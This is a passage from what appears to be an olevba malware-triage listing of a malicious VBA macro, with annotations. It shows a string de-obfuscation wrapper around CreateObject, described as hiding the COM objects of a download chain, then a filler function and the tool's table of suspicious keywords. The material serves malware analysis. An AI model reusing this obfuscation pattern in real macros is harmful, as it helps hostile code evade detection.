       ' String de-obfuscation plus object factory: removes the padding characters "<" (60), "=" (61) and
       ' ";" (59) from the argument and returns CreateObject(<cleaned ProgID>).
       ' Every COM object in the download chain is created through this wrapper, so no ProgID appears in
       ' clear text anywhere in the macro. This is the source of olevba's CreateObject hit for Module2;
       ' when analysing a sample like this, resolving this function's call sites reveals the objects used.
  545. Fpsh8W7KwFw4n3 = Replace(Fpsh8W7KwFw4n3, Chr(60), "")
  546.  Fpsh8W7KwFw4n3 = Replace(Fpsh8W7KwFw4n3, Chr(61), "")
  547.  Fpsh8W7KwFw4n3 = Replace(Fpsh8W7KwFw4n3, Chr(59), "")
  548.  Set w7IAmB5cDGswAm = CreateObject(Fpsh8W7KwFw4n3)
  549. End Function
  550. Function show_chart_controls(thisVisibility As Boolean)
       ' Sets the Visible property of a fixed list of chart buttons, links and labels to thisVisibility.
       ' Triage note: filler; the cevMe qualifier is not defined in this listing, and the only callers
       ' (Form_Load, img_sales_trends_Click) are themselves not reachable from autoopen.
  551.  
  552.   'sales trending controls
  553.  cevMe.a_this_week.Visible = thisVisibility
  554.   cevMe.a_this_month.Visible = thisVisibility
  555.   cevMe.a_this_quarter.Visible = thisVisibility
  556.   cevMe.btn_this_month.Visible = thisVisibility
  557.   cevMe.btn_this_quarter.Visible = thisVisibility
  558.   cevMe.btn_this_week.Visible = thisVisibility
  559.  
  560.   'hourly trending controls
  561.  cevMe.a_hourly_14.Visible = thisVisibility
  562.   cevMe.a_hourly_30.Visible = thisVisibility
  563.   cevMe.a_hourly_sum_14.Visible = thisVisibility
  564.   cevMe.a_hourly_sum_30.Visible = thisVisibility
  565.   cevMe.a_hourly_transactions_14.Visible = thisVisibility
  566.   cevMe.a_hourly_transactions_30.Visible = thisVisibility
  567.  
  568.   cevMe.btn_hourly_14.Visible = thisVisibility
  569.   cevMe.btn_hourly_30.Visible = thisVisibility
  570.   cevMe.btn_hourly_sum_14.Visible = thisVisibility
  571.   cevMe.btn_hourly_sum_30.Visible = thisVisibility
  572.   cevMe.btn_hourly_transactions_14.Visible = thisVisibility
  573.   cevMe.btn_hourly_transactions_30.Visible = thisVisibility
  574.  
  575.   'labels
  576.  cevMe.label_hourly.Visible = thisVisibility
  577.   cevMe.label_avg.Visible = thisVisibility
  578.   cevMe.label_sum.Visible = thisVisibility
  579.   cevMe.label_transactions.Visible = thisVisibility
  580.  
  581. End Function
  582.  
  583.  
  584.  
  585. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  586. ANALYSIS:
  587. +------------+----------------+-----------------------------------------+
  588. | Type       | Keyword        | Description                             |
  589. +------------+----------------+-----------------------------------------+
  590. | Suspicious | Open           | May open a file                         |
  591. | Suspicious | Chr            | May attempt to obfuscate specific       |
  592. |            |                | strings                                 |
  593. | Suspicious | CreateObject   | May create an OLE object                |
  594. | Suspicious | SaveToFile     | May create a text file                  |
  595. | Suspicious | Write          | May write to a file (if combined with   |
  596. |            |                | Open)                                   |
  597. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  598. |            |                | may be used to obfuscate strings        |
  599. |            |                | (option --decode to see all)            |
  600. +------------+----------------+-----------------------------------------+